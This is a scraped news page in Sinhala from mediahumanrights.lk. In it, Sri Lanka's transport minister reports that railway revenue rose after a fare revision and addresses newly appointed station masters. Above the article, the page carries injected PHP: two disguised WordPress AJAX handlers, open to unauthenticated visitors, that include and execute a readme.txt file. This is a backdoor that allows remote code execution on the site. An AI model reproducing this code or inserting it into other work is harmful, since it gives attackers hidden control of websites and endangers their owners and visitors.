if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මා ඇමති වෙද්දි මාසික ආදායම කෝටි 40යි.. දැන් කෝටි 100යි.. - mediahumanrights.lk
mediahumanrights.lk
News Political

මා ඇමති වෙද්දි මාසික ආදායම කෝටි 40යි.. දැන් කෝටි 100යි..

වත්කම් නිසි පරිදි කළමනාකරණය තුළින් ඉදිරියේදී ජනතාවට අතිරේක බරක් නොවන පරිදි දුම්රිය සේවය පවත්වාගෙන යාමට කටයුතු කරන බව ප්‍රවාහන, මහාමාර්ග හා ජනමාධ්‍ය අමාත්‍ය ආචාර්ය බන්දුල ගුණවර්ධන මහතා පවසයි.

අමාත්‍යවරයා මෙම අදහස් පළ කළේ ශ්‍රී ලංකා දුම්රිය දෙපාර්තමේන්තුවට බඳවාගත් දුම්රිය ස්ථානාධිපතිවරුන් පිරිසකට පත්වීම් ලිපි ප්‍රදානය කිරීම සඳහා පැවැති උත්සවයකට එක්වෙමිනි.

2021 වසරේ පැවති විවෘත තරග විභාගයකින් තෝරාගත් සුදුසුකම්ලාභී අපේක්ෂකයින් පිරිසකට තරඟ විභාගයේ ප්‍රතිඵල අනුව රාජ්‍ය සේවා කොමිෂන් සභාවේ විශේෂ අනුමැතියක් සහිතව මෙම පත්වීම් පිරිනැමීය.

මෙම අවස්ථාවේදී තවදුරටත් අදහස් දැක්වූ අමාත්‍යවරයා,

“ මා අමාත්‍යවරයා ලෙස මෙම වගකීම භාර ගන්නා අවස්ථාවේ මාසික ආදායමක් පැවැතුනේ රුපියල් මිලියන 400ක් ලෙස. නමුත් ඉන්ධන මිල ඉහළ යෑම ඇතුළු ගැටළු පිළිබඳව කැබිනට් මණ්ඩලය දැනුවත් කර එහි අනුමැතිය ලබාගෙන දුම්රිය ගාස්තු සංශෝධනය කිරීමට අපි පියවර ගත්තා. එහි ප්‍රතිඵලයක් ලෙස අගෝස්තු මාසයේ සිට සෑම මසකම රුපියල් මිලියන 1000 කට වැඩි ආදායමක් ඉපයීමට දුම්රියදෙපාර්තමේන්තුව සමත්ව තිබෙනවා.

ඉතිහාසයේ දැවැන්තම ආර්ථික අර්බුදයට මුහුණ දී ඇති මේ අවස්ථාවේ අප සියලු දෙනාගේම උත්සාහය විය යුත්තේ මෙහෙයුම් අලාභයකින් තොරව ආයතනය පවත්වාගෙන හැකි ආකාරයට දුම්රිය දෙපාර්තමේන්තුව පත් කිරීමට කැපවීමයි. කිසිදු ආකාරයකින් දුම්රිය සේවය පුද්ගලිකකරණය කිරීමට කිසිදු අදහසක් අපට නැහැ. වඩාත් ඵලදායී හා කාර්යක්ෂම සේවයක් සැලසීම වෙනුවෙන් ගත හැකි උපායමාර්ගික ක්‍රියාමාර්ග පිළිබඳව සාකච්ඡා කිරීමට අප බලාපොරොත්තු වනවා. දුම්රිය සතු වත්කම් නිසි පරිදි කළමනාකරණය තුළින් ජනතාවට අතිරේක බරක් නොවන පරිදි දුම්රිය සේවය පවත්වා ගැනීමට හැකියාව ලැබෙනු ඇති බව මා විශ්වාස කරනවා. ඒ වගකීම නවක පත්වීම් ලබන ඔබට ද බාර වනවා. මේ කිසිදු පත්වීමකට කිසිම දේශපාලන හෝ වෙනත් මැදිහත්වීමක් සිදු වී නැහැ. ඉතාමත් විනිවිද පෙනෙනසුළු නිවැරදි ක්‍රමවේදයක් තුළින් මේ පිරිස තෝරා ගෙන තිබෙනවා. එම නිසා මෙම තනතුරෙහි අභිමානය සුරැකෙන පරිදි රටේ ජනතාවට තම සේවය ලබා දීමේ වගකීම ඔබට භාර වනවා”

– Media unit

Related posts

යේමනය, ලෝකයේ කොළරා වසංගතය පැතිර යන දරුණුතම රට බවට පත්වෙයි

Shiran Viraj

ආන්දෝලනයක් ඇති කළ සුපිරි පන්දු වාරයේ නීති වෙනස් වෙයි

Shiran Viraj

ලක්‍ෂ 69ක් ඡන්දය දුන්නා කියා හරියන්නෑ.. ජනාධිපති පැවති පාර්ලිමේන්තුව කැදවිය යුතුයි…

Shiran Viraj